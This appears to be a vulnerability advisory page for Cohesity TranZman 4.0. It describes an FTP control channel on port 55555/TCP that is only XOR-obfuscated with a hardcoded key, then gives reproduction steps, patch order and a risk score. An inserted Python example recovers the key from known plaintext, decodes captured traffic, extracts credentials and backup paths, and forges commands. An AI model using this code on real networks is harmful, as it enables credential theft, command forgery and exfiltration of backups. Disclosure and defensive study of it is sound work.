Cohesity TranZman Migration Appliance Weak Cryptography Vulnerability

Vulnerability

A weak-cryptography vulnerability exists in Cohesity TranZman Migration Appliance Release 4.0 Build 14614. The TranZman FTP service on port 55555/TCP protects its control channel only by XORing the traffic with a static, hardcoded key. XOR with a fixed key is obfuscation rather than encryption: anyone holding the key, or able to recover it from a predictable plaintext prefix, can reverse it and read credentials and other sensitive information. An attacker positioned to observe or inject traffic on that segment can therefore decrypt the control channel, forge or modify commands, and potentially exfiltrate backup files.

Impact

Exploitation of this vulnerability allows decryption of the FTP control channel, exposing credentials and commands. It also enables unauthorized modification or replay of commands, and such forged commands may bypass certain logging mechanisms, creating an audit blind spot.

Reproduction

To reproduce this vulnerability, capture network traffic on the segment where TranZman is running, filtering on port 55555/TCP. The static XOR key, which is a copyright string, can be extracted from the application's obfuscated Perl modules. Once the key is obtained, applying the same XOR to the captured control channel traffic yields the plaintext commands, from which backup files can be identified and retrieved.
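The decoding step described above, as an added example that is not part of the advisory and not Cohesity's code. It implements repeating-key XOR (which is symmetric, so the same routine decodes captured records and forges new ones), a known-plaintext check for validating a candidate key pulled from the Perl modules, and a small extractor for the credentials and file paths an attacker would look for. ASSUMED_KEY is a constructed placeholder standing in for the hardcoded copyright string; it is not the real TranZman key. The capture is constructed by obfuscating known commands with that placeholder so the example runs offline, and the example assumes the key stream restarts at the beginning of each control-channel record.

```python
# Added example for this advisory; not Cohesity's code and not the advisory's.
# ASSUMED_KEY is a constructed placeholder, not the real TranZman key.
# Assumption: the key stream restarts at the start of every captured record.
from itertools import cycle

ASSUMED_KEY = b"Copyright (c) Example Corp. All rights reserved."  # placeholder


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Symmetric: applying it twice returns the input."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key_prefix(record: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: C XOR P yields the key bytes that covered P.

    FTP control records begin with predictable tokens ('USER ', 'PASS ',
    'RETR '), so the leading key bytes fall out of a single record even
    before the Perl modules are examined."""
    n = min(len(record), len(known_plaintext))
    return bytes(c ^ p for c, p in zip(record[:n], known_plaintext[:n]))


def key_matches_record(record: bytes, candidate: bytes, known_plaintext: bytes) -> bool:
    """Check a candidate key (e.g. a string lifted from the Perl modules)
    against a record with a known prefix before trusting it for bulk decoding."""
    return xor_bytes(record, candidate).startswith(known_plaintext)


def decode_control_channel(records, key: bytes):
    """De-obfuscate every captured record and return the plaintext lines."""
    lines = []
    for rec in records:
        lines.extend(xor_bytes(rec, key).decode("ascii", "replace").splitlines())
    return lines


def extract_credentials_and_files(lines):
    """Collect USER/PASS values and any path named by a transfer/listing verb."""
    creds = {}
    files = []
    for line in lines:
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("USER", "PASS"):
            creds[verb] = arg
        elif verb in ("RETR", "STOR", "LIST", "NLST") and arg:
            files.append(arg)
    return creds, files


def forge_command(command: str, key: bytes) -> bytes:
    """With a static symmetric key, anyone holding it can emit a record that
    is indistinguishable from one produced by the legitimate client."""
    return xor_bytes(command.encode("ascii") + b"\r\n", key)


# Constructed capture: obfuscated with the placeholder key so this runs
# offline. A real capture would be taken from port 55555/TCP.
CONSTRUCTED_PLAINTEXT = [
    b"USER tzmadmin\r\n",
    b"PASS s3cret-example\r\n",
    b"RETR /backups/vol1/full-2025-10-01.bak\r\n",
]
CONSTRUCTED_CAPTURE = [xor_bytes(p, ASSUMED_KEY) for p in CONSTRUCTED_PLAINTEXT]

if __name__ == "__main__":
    # Validate the candidate key on the predictable 'USER ' prefix first.
    assert key_matches_record(CONSTRUCTED_CAPTURE[0], ASSUMED_KEY, b"USER ")
    print("leading key bytes:", recover_key_prefix(CONSTRUCTED_CAPTURE[0], b"USER "))
    decoded = decode_control_channel(CONSTRUCTED_CAPTURE, ASSUMED_KEY)
    print(extract_credentials_and_files(decoded))
    forged = forge_command("RETR /backups/vol1/other.bak", ASSUMED_KEY)
    print(xor_bytes(forged, ASSUMED_KEY))
```

If the real service keeps a continuous key stream across records rather than restarting it, the per-record offset into the key must be tracked; the known-plaintext check above will fail on the second record and reveal that immediately.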

Remediation

Cohesity has released patches for this vulnerability. Users should apply the patches in the following order: 'TZM_patch_1.patch' followed by 'TZM_1760106063_OCT2025R2_FULL.depot'. For the latest OVA version with integrated fixes, contact Cohesity support.

Added: Mar 3, 2026, 6:22 PM
Updated: Mar 3, 2026, 10:28 PM

Vulnerability Rating (Custom Algorithm)

spread           0.0
impact           5.0
exploitability   4.8
remediation      0.0
relevance        3.4
threat           1.6
urgency          2.9
incentive        0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.